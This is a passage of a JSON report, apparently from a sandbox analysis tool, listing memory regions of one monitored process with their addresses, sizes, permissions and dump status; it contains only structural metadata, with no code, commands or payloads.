49938432, "timestamp": "00:00:38.105", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000412-addr_0x0000000002fb0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_22", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 50003968, "type": "region", "version": 1 }, "end_va": 50008063, "entry_point": 0, "filename": null, "id": "region_412", "name": "private_0x0000000002fb0000", "norm_filename": null, "region_type": "private_memory", "start_va": 50003968, "timestamp": "00:00:38.105", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000413-addr_0x0000000004790000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_23", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 75038720, "type": "region", "version": 1 }, "end_va": 75042815, "entry_point": 0, "filename": null, "id": "region_413", "name": "private_0x0000000004790000", "norm_filename": null, "region_type": "private_memory", "start_va": 75038720, "timestamp": "00:00:38.106", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000414-addr_0x00000000049a0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_24", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 77201408, "type": "region", "version": 1 }, "end_va": 77205503, "entry_point": 0, "filename": null, "id": "region_414", "name": "private_0x00000000049a0000", "norm_filename": null, "region_type": 
"private_memory", "start_va": 77201408, "timestamp": "00:00:38.106", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000415-addr_0x0000000004c90000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_25", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 80281600, "type": "region", "version": 1 }, "end_va": 80285695, "entry_point": 0, "filename": null, "id": "region_415", "name": "private_0x0000000004c90000", "norm_filename": null, "region_type": "private_memory", "start_va": 80281600, "timestamp": "00:00:38.106", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000416-addr_0x0000000004ca0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_26", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 80347136, "type": "region", "version": 1 }, "end_va": 80351231, "entry_point": 0, "filename": null, "id": "region_416", "name": "private_0x0000000004ca0000", "norm_filename": null, "region_type": "private_memory", "start_va": 80347136, "timestamp": "00:00:38.107", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000417-addr_0x0000000004cb0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_27", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 80412672, "type": "region", "version": 1 }, "end_va": 80416767, "entry_point": 0, "filename": null, "id": "region_417", "name": "private_0x0000000004cb0000", 
"norm_filename": null, "region_type": "private_memory", "start_va": 80412672, "timestamp": "00:00:38.107", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000418-addr_0x0000000004cc0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_28", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 80478208, "type": "region", "version": 1 }, "end_va": 80482303, "entry_point": 0, "filename": null, "id": "region_418", "name": "private_0x0000000004cc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 80478208, "timestamp": "00:00:38.108", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000419-addr_0x0000000004dd0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_29", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 81592320, "type": "region", "version": 1 }, "end_va": 81596415, "entry_point": 0, "filename": null, "id": "region_419", "name": "private_0x0000000004dd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 81592320, "timestamp": "00:00:38.108", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000420-addr_0x0000000004de0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_30", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 81657856, "type": "region", "version": 1 }, "end_va": 81661951, "entry_point": 0, "filename": null, "id": "region_420", "name": 
"private_0x0000000004de0000", "norm_filename": null, "region_type": "private_memory", "start_va": 81657856, "timestamp": "00:00:38.108", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000421-addr_0x0000000004df0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_31", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 81723392, "type": "region", "version": 1 }, "end_va": 81727487, "entry_point": 0, "filename": null, "id": "region_421", "name": "private_0x0000000004df0000", "norm_filename": null, "region_type": "private_memory", "start_va": 81723392, "timestamp": "00:00:38.108", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000422-addr_0x0000000005680000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_32", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 90701824, "type": "region", "version": 1 }, "end_va": 90705919, "entry_point": 0, "filename": null, "id": "region_422", "name": "private_0x0000000005680000", "norm_filename": null, "region_type": "private_memory", "start_va": 90701824, "timestamp": "00:00:38.109", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000423-addr_0x0000000005690000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_33", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 90767360, "type": "region", "version": 1 }, "end_va": 90771455, "entry_point": 0, "filename": null, "id": 
"region_423", "name": "private_0x0000000005690000", "norm_filename": null, "region_type": "private_memory", "start_va": 90767360, "timestamp": "00:00:38.109", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000424-addr_0x00000000056a0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_34", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 90832896, "type": "region", "version": 1 }, "end_va": 90836991, "entry_point": 0, "filename": null, "id": "region_424", "name": "private_0x00000000056a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 90832896, "timestamp": "00:00:38.109", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000425-addr_0x00000000056b0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_35", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 90898432, "type": "region", "version": 1 }, "end_va": 90902527, "entry_point": 0, "filename": null, "id": "region_425", "name": "private_0x00000000056b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 90898432, "timestamp": "00:00:38.110", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000426-addr_0x00000000056c0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_36", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 90963968, "type": "region", "version": 1 }, "end_va": 90968063, "entry_point": 0, 
"filename": null, "id": "region_426", "name": "private_0x00000000056c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 90963968, "timestamp": "00:00:38.110", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000427-addr_0x00000000056d0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_37", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 91029504, "type": "region", "version": 1 }, "end_va": 91033599, "entry_point": 0, "filename": null, "id": "region_427", "name": "private_0x00000000056d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 91029504, "timestamp": "00:00:38.110", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000428-addr_0x00000000058e0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_38", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 93192192, "type": "region", "version": 1 }, "end_va": 93196287, "entry_point": 0, "filename": null, "id": "region_428", "name": "private_0x00000000058e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 93192192, "timestamp": "00:00:38.111", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000429-addr_0x00000000058f0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_39", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 93257728, "type": "region", "version": 1 }, "end_va": 
93261823, "entry_point": 0, "filename": null, "id": "region_429", "name": "private_0x00000000058f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 93257728, "timestamp": "00:00:38.111", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000430-addr_0x0000000005900000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_40", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 93323264, "type": "region", "version": 1 }, "end_va": 93327359, "entry_point": 0, "filename": null, "id": "region_430", "name": "private_0x0000000005900000", "norm_filename": null, "region_type": "private_memory", "start_va": 93323264, "timestamp": "00:00:38.111", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000431-addr_0x0000000005910000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_41", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 93388800, "type": "region", "version": 1 }, "end_va": 93392895, "entry_point": 0, "filename": null, "id": "region_431", "name": "private_0x0000000005910000", "norm_filename": null, "region_type": "private_memory", "start_va": 93388800, "timestamp": "00:00:38.111", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000432-addr_0x0000000005920000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_42", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 93454336, "type": "region", 
"version": 1 }, "end_va": 93458431, "entry_point": 0, "filename": null, "id": "region_432", "name": "private_0x0000000005920000", "norm_filename": null, "region_type": "private_memory", "start_va": 93454336, "timestamp": "00:00:38.112", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000433-addr_0x00000000059b0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_43", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 94044160, "type": "region", "version": 1 }, "end_va": 94048255, "entry_point": 0, "filename": null, "id": "region_433", "name": "private_0x00000000059b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 94044160, "timestamp": "00:00:38.112", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000434-addr_0x00000000059c0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_44", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 94109696, "type": "region", "version": 1 }, "end_va": 94113791, "entry_point": 0, "filename": null, "id": "region_434", "name": "private_0x00000000059c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 94109696, "timestamp": "00:00:38.112", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000435-addr_0x0000000005a50000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_45", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 
94699520, "type": "region", "version": 1 }, "end_va": 94703615, "entry_point": 0, "filename": null, "id": "region_435", "name": "private_0x0000000005a50000", "norm_filename": null, "region_type": "private_memory", "start_va": 94699520, "timestamp": "00:00:38.112", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000436-addr_0x0000000005a60000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_46", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 94765056, "type": "region", "version": 1 }, "end_va": 94769151, "entry_point": 0, "filename": null, "id": "region_436", "name": "private_0x0000000005a60000", "norm_filename": null, "region_type": "private_memory", "start_va": 94765056, "timestamp": "00:00:38.113", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000437-addr_0x0000000005a70000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_47", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 94830592, "type": "region", "version": 1 }, "end_va": 94834687, "entry_point": 0, "filename": null, "id": "region_437", "name": "private_0x0000000005a70000", "norm_filename": null, "region_type": "private_memory", "start_va": 94830592, "timestamp": "00:00:38.113", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000438-addr_0x0000000006e90000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_48", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, 
"size": 4096, "start_va": 115933184, "type": "region", "version": 1 }, "end_va": 115937279, "entry_point": 0, "filename": null, "id": "region_438", "name": "private_0x0000000006e90000", "norm_filename": null, "region_type": "private_memory", "start_va": 115933184, "timestamp": "00:00:38.114", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000439-addr_0x0000000006ea0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_49", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 115998720, "type": "region", "version": 1 }, "end_va": 116002815, "entry_point": 0, "filename": null, "id": "region_439", "name": "private_0x0000000006ea0000", "norm_filename": null, "region_type": "private_memory", "start_va": 115998720, "timestamp": "00:00:38.114", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000440-addr_0x0000000006eb0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_50", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 116064256, "type": "region", "version": 1 }, "end_va": 116068351, "entry_point": 0, "filename": null, "id": "region_440", "name": "private_0x0000000006eb0000", "norm_filename": null, "region_type": "private_memory", "start_va": 116064256, "timestamp": "00:00:38.114", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000441-addr_0x0000000006ec0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_51", "ref_source": "summary", "ref_type": "process_dump", 
"type": "reference", "version": 1 }, "size": 4096, "start_va": 116129792, "type": "region", "version": 1 }, "end_va": 116133887, "entry_point": 0, "filename": null, "id": "region_441", "name": "private_0x0000000006ec0000", "norm_filename": null, "region_type": "private_memory", "start_va": 116129792, "timestamp": "00:00:38.115", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000445-addr_0x000007fffff74000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_52", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092448768, "type": "region", "version": 1 }, "end_va": 8796092456959, "entry_point": 0, "filename": null, "id": "region_445", "name": "private_0x000007fffff74000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092448768, "timestamp": "00:00:38.131", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000446-addr_0x000007fffff76000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_53", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092456960, "type": "region", "version": 1 }, "end_va": 8796092465151, "entry_point": 0, "filename": null, "id": "region_446", "name": "private_0x000007fffff76000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092456960, "timestamp": "00:00:38.131", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000453-addr_0x0000000002590000-size_0x000000000000f000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": 
"proc_dump_54", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 61440, "start_va": 39387136, "type": "region", "version": 1 }, "end_va": 39448575, "entry_point": 0, "filename": null, "id": "region_453", "name": "private_0x0000000002590000", "norm_filename": null, "region_type": "private_memory", "start_va": 39387136, "timestamp": "00:00:38.539", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000455-addr_0x0000000002a20000-size_0x000000000001f000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_55", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 126976, "start_va": 44171264, "type": "region", "version": 1 }, "end_va": 44298239, "entry_point": 0, "filename": null, "id": "region_455", "name": "private_0x0000000002a20000", "norm_filename": null, "region_type": "private_memory", "start_va": 44171264, "timestamp": "00:00:38.540", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000459-addr_0x0000000009ee0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_56", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 166592512, "type": "region", "version": 1 }, "end_va": 167641087, "entry_point": 0, "filename": null, "id": "region_459", "name": "private_0x0000000009ee0000", "norm_filename": null, "region_type": "private_memory", "start_va": 166592512, "timestamp": "00:00:38.541", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000461-addr_0x000007fffff72000-size_0x0000000000002000-perm_rw.bin", 
"flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_57", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092440576, "type": "region", "version": 1 }, "end_va": 8796092448767, "entry_point": 0, "filename": null, "id": "region_461", "name": "private_0x000007fffff72000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092440576, "timestamp": "00:00:38.551", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000463-addr_0x0000000002720000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_58", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 41025536, "type": "region", "version": 1 }, "end_va": 41033727, "entry_point": 0, "filename": null, "id": "region_463", "name": "private_0x0000000002720000", "norm_filename": null, "region_type": "private_memory", "start_va": 41025536, "timestamp": "00:00:38.964", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000464-addr_0x00000000058e0000-size_0x000000000001f000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_59", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 126976, "start_va": 93192192, "type": "region", "version": 1 }, "end_va": 93319167, "entry_point": 0, "filename": null, "id": "region_464", "name": "private_0x00000000058e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 93192192, "timestamp": "00:00:38.965", "type": "region", "version": 1 }, { "dump": { "filename": 
"process_00000001-region_00000465-addr_0x0000000005a50000-size_0x000000000001f000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_60", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 126976, "start_va": 94699520, "type": "region", "version": 1 }, "end_va": 94826495, "entry_point": 0, "filename": null, "id": "region_465", "name": "private_0x0000000005a50000", "norm_filename": null, "region_type": "private_memory", "start_va": 94699520, "timestamp": "00:00:38.965", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000466-addr_0x0000000006e90000-size_0x0000000000021000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_61", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 135168, "start_va": 115933184, "type": "region", "version": 1 }, "end_va": 116068351, "entry_point": 0, "filename": null, "id": "region_466", "name": "private_0x0000000006e90000", "norm_filename": null, "region_type": "private_memory", "start_va": 115933184, "timestamp": "00:00:38.965", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000467-addr_0x0000000007000000-size_0x000000000001f000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_62", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 126976, "start_va": 117440512, "type": "region", "version": 1 }, "end_va": 117567487, "entry_point": 0, "filename": null, "id": "region_467", "name": "private_0x0000000007000000", "norm_filename": null, "region_type": "private_memory", "start_va": 117440512, "timestamp": "00:00:38.966", "type": "region", 
"version": 1 }, { "dump": { "filename": "process_00000001-region_00000471-addr_0x000000000a130000-size_0x0000000000080000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_63", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 169017344, "type": "region", "version": 1 }, "end_va": 169541631, "entry_point": 0, "filename": null, "id": "region_471", "name": "private_0x000000000a130000", "norm_filename": null, "region_type": "private_memory", "start_va": 169017344, "timestamp": "00:00:39.051", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000484-addr_0x000000000a320000-size_0x0000000000080000-perm_rwx.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_64", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 171048960, "type": "region", "version": 1 }, "end_va": 171573247, "entry_point": 0, "filename": null, "id": "region_484", "name": "private_0x000000000a320000", "norm_filename": null, "region_type": "private_memory", "start_va": 171048960, "timestamp": "00:00:39.942", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000489-addr_0x0000000009400000-size_0x0000000000020000-perm_.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_65", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 
131072, "start_va": 155189248, "type": "region", "version": 1 }, "end_va": 155320319, "entry_point": 0, "filename": null, "id": "region_489", "name": "private_0x0000000009400000", "norm_filename": null, "region_type": "private_memory", "start_va": 155189248, "timestamp": "00:00:41.579", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000490-addr_0x0000000009fe0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_66", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 167641088, "type": "region", "version": 1 }, "end_va": 168689663, "entry_point": 0, "filename": null, "id": "region_490", "name": "private_0x0000000009fe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 167641088, "timestamp": "00:00:41.579", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000492-addr_0x000000000a3a0000-size_0x0000000000101000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_67", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1052672, "start_va": 171573248, "type": "region", "version": 1 }, "end_va": 172625919, "entry_point": 0, "filename": null, "id": "region_492", "name": "private_0x000000000a3a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 171573248, "timestamp": "00:00:41.580", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000493-addr_0x000000000a570000-size_0x0000000000010000-perm_rw.bin", "flags": [ 
"dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_68", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 173473792, "type": "region", "version": 1 }, "end_va": 173539327, "entry_point": 0, "filename": null, "id": "region_493", "name": "private_0x000000000a570000", "norm_filename": null, "region_type": "private_memory", "start_va": 173473792, "timestamp": "00:00:41.580", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000495-addr_0x0000000022580000-size_0x00000000006d0000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_69", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 7143424, "start_va": 576192512, "type": "region", "version": 1 }, "end_va": 583335935, "entry_point": 0, "filename": null, "id": "region_495", "name": "private_0x0000000022580000", "norm_filename": null, "region_type": "private_memory", "start_va": 576192512, "timestamp": "00:00:41.588", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000500-addr_0x000007ff00050000-size_0x0000000000010000-perm_.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_70", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791798382592, "type": "region", "version": 1 }, "end_va": 8791798448127, "entry_point": 0, "filename": null, "id": "region_500", "name": "private_0x000007ff00050000", "norm_filename": null, "region_type": "private_memory", "start_va": 
